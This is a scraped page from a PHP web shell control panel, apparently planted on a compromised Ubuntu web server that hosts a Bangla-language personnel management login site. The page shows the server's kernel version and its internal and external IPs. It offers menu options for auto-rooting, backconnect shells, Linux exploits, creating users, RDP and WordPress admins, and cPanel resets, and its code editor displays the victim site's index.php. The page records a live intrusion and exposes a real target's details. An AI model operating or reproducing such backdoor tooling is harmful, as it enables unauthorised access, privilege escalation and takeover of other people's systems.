Linux 0193-eed-moe-app01 5.15.0-46-generic #49-Ubuntu SMP Thu Aug 4 18:03:25 UTC 2022 x86_64
Apache/2.4.52 (Ubuntu)
: 172.16.229.234 | : 18.117.230.210
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.18
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
eedpims
[ DIR ]
drwxrwxrwx
index.php
7.56
KB
-rw-r--r--
index333.html
10.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php session_start(); include("eedpims/login/header.php"); include("eedpims/common/config.php"); ?> <style> /* Container holding the image and the text */ /* Bottom left text */ .bottom-left { position: absolute; bottom: 8px; left: 16px; } /* Top left text */ .top-left { position: absolute; top: 8px; left: 16px; } /* Top right text */ .top-right { position: absolute; top: 8px; right: 16px; } /* Bottom right text */ .bottom-right { position: absolute; bottom: 8px; right: 16px; } /* Centered text */ .centered { position: absolute; top: 50%; left: 13%; transform: translate(-13%, -50%); } @font-face { font-family: 'cSoliman'; src: url('eedpims/css/solimanlipi/SolaimanLipi.ttf') format('truetype'); } </style> <div class="container" style="padding-top: 5px;padding-bottom: 5px;"> <div class="row"> <div class="col-md-12"> <img src="eedpims/images/logo.png" align="middle" height="65px" width="65px"> <span class="centered" style="font-size: 25px;color:#7d48ec;font-family:cSoliman;"><b>ইইডি পার্সোনেল ইন্ট্রিগ্রেটেড ম্যানেজমেন্ট সিস্টেম</b></span> <div class="pull-right"><a href="#"> <img src="eedpims/login/right-side.png" align="middle"></a></div> </div> </div> </div> <div class="container-fluid" style="background-image: linear-gradient(to right, #7d48ec , #7d48ec);"> <div class="row"> <div class="col-md-12" style="font-size: 16px;color:white;font-family:cSoliman;padding-top: 10px;padding-bottom: 10px;"> <a href="#"> <img src="eedpims/login/home.png" align="middle" height="20px" width="20px"></a> <b> হোম</b> । <b> কার্যক্রম সর্ম্পকে</b> । <b> কর্মকর্তাদের তালিকা</b> । <b> সরকারি আদেশ</b> </div> </div> </div> <?php // prepare and bind $stmt = $conn->prepare("SELECT coff.circleofficeName AS linename, COUNT(doff.circleoffice_id) AS id FROM general g LEFT JOIN designation d ON(g.designation_id=d.id) LEFT JOIN office o INNER JOIN districtoffice doff ON(o.districtoffice_id=doff.id) INNER JOIN circleoffice coff ON(doff.circleoffice_id=coff.id) ON(g.office_id=o.id) WHERE 1=1 AND g.status_id=1 GROUP BY doff.circleoffice_id ORDER BY coff.slno"); $stmt->execute(); //Result $result = $stmt->get_result(); $rowcount=$result->num_rows; $slno=0; $tot=0; ?> <script type="text/javascript" src="https://www.google.com/jsapi"></script> <script type="text/javascript"> google.load("visualization", "1", {packages:["corechart"]}); google.setOnLoadCallback(drawChart); function drawChart() { var data = google.visualization.arrayToDataTable([ ['linename', 'id'], <?php include("eedpims/common/functions.php"); while($row = $result->fetch_assoc()) { $linename =$row['linename']; $linename=str_replace('তত্ত্বাবধায়ক প্রকৌশলীর কার্যালয়,','',$linename); $id = $row['id']; $slno=$slno+1; $tot=$tot+$id; if ($rowcount>$slno){ echo "['".$linename." : ".bangladate($id)."',".$id."],"; } else {echo "['".$linename." : ".bangladate($id)."',".$id."]";} } $stmt->close(); ?> ]); var options = { chartArea:{left:-50,top:30,width:"100%"}, width: 'auto', height: 600, sliceVisibilityThreshold: 0, fontName: 'cSoliman', fontSize: 17, is3D: true }; var chart = new google.visualization.PieChart(document.getElementById('piechart_3d')); chart.draw(data, options); } </script> <div class="container"> <div class="row"> <div style="font-family:cSoliman; padding-top:30px;" align="center" class="pull-center"> <b> মোট জনবল (সংখ্যায়) : <?= bangladate($tot)?></b> </div> <div class="col-md-8" style="font-family:cSoliman;" id="piechart_3d"></div> <div class="col-md-4" style="font-family:cSoliman;"> <div style="box-shadow: 0px 1px 2px 0px rgba(60, 64, 67, 0.3),0px 1px 3px 1px rgba(60, 64, 67, 0.15);"> <br> <p style="font-size:25px;color:#7d48ec;" align="center"><b>লগ ইন </b> </p> ই-মেইল <span style="color:red">*</span> <form class="form-signin" role="form" method="POST" action="eedpims/login/login.php"> <div style="padding-left: 10px;padding-right: 10px; padding-top: 5px;padding-bottom: 10px;"> <input type="text" class="form-control input-lg" id="uname" name="uname" placeholder="email"> </div> পাসওয়ার্ড <span style="color:red">*</span> <div style="padding-left: 10px;padding-right: 10px; padding-top: 5px;padding-bottom: 10px;"> <input type="password" class="form-control input-lg" id="upassword" name="upassword" placeholder="Password"> </div> <button type="button" onclick="showHide()" id="eye" class="btn btn-default btn-sm"> <span class="glyphicon glyphicon-eye-open"> </button> <a href="eedpims/login/login.php?cmd=forget_editor" onClick=" return confirm('আপনার মেইলে কি পাসওর্য়াড পাঠাতে হবে?');"><font color="red">পাসওয়ার্ড ভুলে গিয়েছি</font></a> <input type="hidden" name="cmd" value="login"/> <div style="padding-left: 10px;padding-right: 10px; padding-top: 5px;padding-bottom: 10px;" > <button class="btn btn-lg btn-block" type="submit" style="background-image: linear-gradient(to right, #7d48ec , #7d48ec);"> <span style="font-size: 16px;color:white;"><b>প্রবেশ করুন</b> <span class="glyphicon glyphicon-log-in"></span> </span> </button> </div> <div style="padding-left: 10px;padding-right: 10px; padding-top: 5px;padding-bottom: 10px;" > <a href="eedpims/userregistration/userinfo_editor.php" class="btn btn-block btn-lg text" style="background-image: linear-gradient(to right, #483ea5 , #483ea5);color: white;">আপনি নতুন ইউজার হলে রেজিষ্ট্রেশন করুন</a> </div> <br> <p><font color="#009e41"><?=$_SESSION["logmes"]?></font></p> </form> </div><!--End box--> </div><!--End col-md-4--> </div> <!--End Raw--> </div> <!--End Container--> <div style="background-image: linear-gradient(to right, #483ea5 , #483ea5);color: white; position: fixed; bottom: 0; width: 100%;" class="container-fluid"> <br> </div><!--End footer--> <script> $(document).ready(function () { $("#eye").click(function () { if ($("#upassword").attr("type") === "password") { $("#upassword").attr("type", "text"); } else { $("#upassword").attr("type", "password"); } }); }); </script>
Close